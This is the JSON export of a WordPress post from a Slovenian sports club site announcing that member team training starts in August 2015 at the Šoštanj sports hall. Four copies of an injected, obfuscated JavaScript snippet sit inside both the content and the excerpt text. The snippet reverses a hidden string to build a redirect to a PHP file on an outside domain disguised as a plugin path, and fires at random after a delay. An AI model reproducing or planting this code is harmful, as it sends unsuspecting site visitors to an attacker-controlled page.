{"id":7745,"date":"2015-08-04T00:00:00","date_gmt":"2015-08-04T00:00:00","guid":{"rendered":"http:\/\/sostanj.info\/2019\/pricetek-treningov-clanov"},"modified":"2019-08-27T14:55:28","modified_gmt":"2019-08-27T12:55:28","slug":"pricetek-treningov-clanov","status":"publish","type":"post","link":"https:\/\/sostanj.info\/2019\/pricetek-treningov-clanov\/","title":{"rendered":"Pri\u010detek treningov \u010dlanov"},"content":{"rendered":"<p>V \u010detrtek, 6. avgusta 2015 se bo<script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>do ob 18. uri v &Scaron;portni dvorani &Scaron;o&scaron;tanj pri\u010deli treningi \u010dlanske ekipe. Na trening so vabljeni vsi kadeti, mladinci, \u010dlani z veljavnimi pogodbami ter tisti, ki so bili s strani uprave posebej povabljeni. Za nadaljne termine se bo sproti <script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>dogovarjalo s trenerjema Du&scaron;anom Mali\u010devi\u00e6em ter Toma\u017eem Hermanom.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>V \u010detrtek, 6. avgusta 2015 se bo<script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>do ob 18. uri v &Scaron;portni dvorani &Scaron;o&scaron;tanj pri\u010deli treningi \u010dlanske ekipe. Na trening so vabljeni vsi kadeti, mladinci, \u010dlani z veljavnimi pogodbami ter tisti, ki so bili s strani uprave posebej povabljeni. Za nadaljne termine se bo sproti <script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-retoof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>dogovarjalo s trenerjema Du&scaron;anom Mali\u010devi\u00e6em ter Toma\u017eem Hermanom.<\/p>\n","protected":false},"author":1,"featured_media":8430,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-7745","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-arhiv"],"_links":{"self":[{"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/posts\/7745","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/comments?post=7745"}],"version-history":[{"count":1,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/posts\/7745\/revisions"}],"predecessor-version":[{"id":9394,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/posts\/7745\/revisions\/9394"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/media\/8430"}],"wp:attachment":[{"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/media?parent=7745"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/categories?post=7745"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/tags?post=7745"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}